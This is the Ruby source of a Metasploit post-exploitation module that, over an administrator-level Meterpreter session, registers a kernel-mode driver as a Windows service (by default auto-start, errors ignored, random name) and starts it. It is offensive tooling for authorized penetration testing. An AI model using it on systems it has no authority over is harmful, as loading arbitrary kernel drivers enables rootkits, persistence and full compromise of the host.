GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/driver_loader.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
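class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Error

  # Module option value -> SCM start-type constant name passed to service_create.
  START_TYPE = {
    'demand' => 'SERVICE_DEMAND_START',
    'boot' => 'SERVICE_BOOT_START',
    'auto' => 'SERVICE_AUTO_START',
    'disabled' => 'SERVICE_DISABLED',
    'system' => 'SERVICE_SYSTEM_START'
  }.freeze

  # Module option value -> SCM error-control constant name.
  ERROR_TYPE = {
    'critical' => 'SERVICE_ERROR_CRITICAL',
    'normal' => 'SERVICE_ERROR_NORMAL',
    'severe' => 'SERVICE_ERROR_SEVERE',
    'ignore' => 'SERVICE_ERROR_IGNORE'
  }.freeze

  # Module option value -> SCM service-type constant name.
  SERVICE_TYPE = {
    'kernel' => 'SERVICE_KERNEL_DRIVER',
    'file_system' => 'SERVICE_FILE_SYSTEM_DRIVER',
    'adapter' => 'SERVICE_ADAPTER',
    'recognizer' => 'SERVICE_RECOGNIZER_DRIVER'
  }.freeze

  # Declares module metadata and the datastore options.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Driver Loader',
        'Description' => %q{
          This module loads a KMD (Kernel Mode Driver) using the Windows Service API.
        },
        'License' => MSF_LICENSE,
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ]
      )
    )

    register_options(
      [
        OptString.new('DRIVER_PATH', [true, 'Driver path in %SYSTEMROOT%. Example: c:\\windows\\system32\\msf.sys']),
        OptString.new('DRIVER_NAME', [false, 'Driver Name.']),
        OptEnum.new('START_TYPE', [true, 'Start type.', 'auto', [ 'boot', 'system', 'auto', 'demand', 'disabled']]),
        OptEnum.new('SERVICE_TYPE', [true, 'Service type.', 'kernel', [ 'kernel', 'file_system', 'adapter', 'recognizer']]),
        OptEnum.new('ERROR_TYPE', [true, 'Error type.', 'ignore', [ 'ignore', 'normal', 'severe', 'critical']])
      ]
    )
  end

  # Entry point: validates privileges and the driver path, registers the
  # driver as a service and then starts it.
  #
  # Prints an error and returns early when the session is not admin, when the
  # path is not under %SYSTEMROOT%, when the file is missing, or when the
  # service could not be created.
  def run
    driver = datastore['DRIVER_PATH']
    start = START_TYPE[datastore['START_TYPE']]
    error = ERROR_TYPE[datastore['ERROR_TYPE']]
    service = SERVICE_TYPE[datastore['SERVICE_TYPE']]

    # Fall back to a random alphabetic service name when none was supplied.
    name = datastore['DRIVER_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(6..13)) : datastore['DRIVER_NAME']

    unless is_admin?
      print_error("Administrator or better privileges needed. Try 'getsystem' first.")
      return
    end

    # Anchor at the start of the string so the path must *begin* with the
    # expanded %SYSTEMROOT%; the previous unanchored match accepted any path
    # that merely contained it somewhere in the middle.
    system_root = Regexp.escape(expand_path('%SYSTEMROOT%'))
    unless driver.match?(/\A#{system_root}/i)
      print_error('The driver must be inside %SYSTEMROOT%.')
      return
    end

    unless file_exist?(driver)
      print_error("Driver #{driver} does not exist.")
      return
    end

    # install_driver returns true/false, not a Win32 error code. The original
    # compared its result with Windows::Error::SUCCESS (0), which `true` never
    # equals, so the service was never started after a successful install.
    return unless install_driver(name, path: driver, starttype: start, error_control: error, service_type: service)

    case service_start(name)
    when Windows::Error::SUCCESS
      print_good('Driver loaded successfully.')
    when Windows::Error::SERVICE_ALREADY_RUNNING
      print_error('Service already started.')
    when Windows::Error::SERVICE_DISABLED
      print_error('Service disabled.')
    else
      print_error('There was an error starting the service.')
    end
  end

  # Registers the driver with the Service Control Manager via service_create.
  #
  # @param name [String] service name
  # @param opts [Hash] passed through to service_create
  #   (:path, :starttype, :error_control, :service_type)
  # @return [Boolean] true when the service object was created, false otherwise
  def install_driver(name, opts = {})
    rc = service_create(name, opts)

    case rc
    when Windows::Error::SUCCESS
      print_status("Service object \"#{name}\" added to the Service Control Manager database.")
      true
    when Windows::Error::SERVICE_EXISTS
      print_error('The specified service already exists.')
      # Show ImagePath just to know if the service corresponds to the desired driver.
      service = service_info(name)
      print_error("Path of driver file in \"#{name}\" service: #{service[:path]}.")
      false
    else
      print_error("There was an error opening the driver handler. GetLastError=#{rc}.")
      false
    end
  end
end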